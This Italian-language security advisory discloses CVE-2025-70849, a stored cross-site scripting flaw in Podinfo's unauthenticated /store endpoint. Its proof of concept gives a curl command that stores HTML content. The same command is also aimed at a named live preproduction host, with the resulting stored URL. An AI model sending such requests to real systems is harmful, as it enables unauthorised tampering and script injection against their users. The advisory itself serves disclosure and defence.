CVE-2025-70849: XSS Memorizzato in Podinfo
Riepilogo
Una vulnerabilità di sicurezza (CWE-79) è stata identificata in Podinfo, un'applicazione web per dimostrare microservizi Kubernetes. La funzionalità /store consente a utenti non autenticati di caricare contenuti HTML/JS arbitrari, portando a XSS Memorizzato.
Dettagli della Vulnerabilità
- CVE ID: CVE-2025-70849
- Prodotto: Podinfo
- Endpoint Affetto:
/store
- Tipo di Vulnerabilità: Cross-Site Scripting Memorizzato (XSS)
- Versioni Affette:
<= 6.10.0
Proof of Concept (PoC)
- Invia il payload malevolo:
curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
esempio con target live:
curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
-
Accedi all'hash restituito: https:///store/
esempio: https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store/8c1591e1b1e025067a2d73c0853b9a76bd8fc91a
Cronologia
- Scoperta: Sep 2025
- Fornitore Notificato: 25 OCT 2025
- Risposta del Fornitore: Riconosciuto; dichiarato nessuna tempistica attuale per la correzione.
- Divulgazione Pubblica: February 2026
Disclaimer
Questa ricerca è solo a scopo educativo.
RINGRAZIAMENTI A :
Kazi Sabbir |